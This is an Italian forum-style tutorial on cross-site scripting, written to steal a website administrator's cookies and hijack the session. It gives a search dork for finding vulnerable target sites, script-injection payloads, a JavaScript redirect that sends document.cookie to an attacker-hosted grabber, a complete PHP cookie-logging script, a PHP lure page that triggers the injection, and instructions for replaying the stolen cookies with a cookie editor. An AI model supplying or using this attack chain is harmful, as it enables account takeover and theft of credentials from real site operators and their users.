Cross Site Scripting:Questa tecnica, chiamata anche XSS, è una vulnerabilità che avvolge websites con scarso controllo di variabili derivate da input dell'utente . In questo modo si può modificare la sorgente di una pagina grabbando i cookie dell'admin. Si inietta codice javascript maligno o nella barra degli indirizzi o nel modulo Search.
<script>alert(/quel che ti pare/)</script> permette di far apparire un semplice alert in javascript con dentro la frase che hai scelto.
<script>(document.cookie)</script> grabba i TUOI cookie ma come fare per grabbare i cookie dell'admin?
Per trovare siti vulnerabili si può usare questa dork: inurl:"index.php/page="
se il sito vittima è
andremo a inserire la nostra xss quindi www.sitovittima.it/index.php/page<script>(document.cookie)</script> vedremo un alert con i nostri cookie e il nostro SID.
Per i cookie dell'admin dobbiamo fare un semplice redirect che appunto redirecta l'admin al nostro cookie grabber.
Redirect:
Codice:
location.href='http://www.link del cookie grabber?cookie='+escape(document.cookie)
e salviamo in sc.js.
Cookie grabber:
Codice:
<?php
$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$ref=$_SERVER['HTTP_REFERER'];
$data = date('j/n/y - H:i') ;
$cookielog = "cookielog.html";
// echo $cookie;
$msg="nCookie:$cookie Ip Address: $ip HTTPREF: $ref DATA: $data";
$file = fopen($cookielog, 'a');
$write = fwrite($file, $msg);
$close = fclose($file);
?>
che rinomineremo in log.php, e hosteremo tutto su un nostro spazio web..consiglio altervista
Ora andiamo a creare il file index.php
Codice:
<?
$sito = "http://www.esempio.com/ricerca?tipo=artista&ricerca=<script>document.location="http://www.link dove è hostato il file sc.js"</script>";
print '
<meta HTTP-EQUIV="Refresh" CONTENT="1; URL='.$sito.'">
';
?>
Se l'admin clicca sul sc.js viene redirectato al cookie grabber..
Ora non ci resta da fare che cambiare i nostri cookie con quelli dell'admin..useremo AN EC Cookie Editor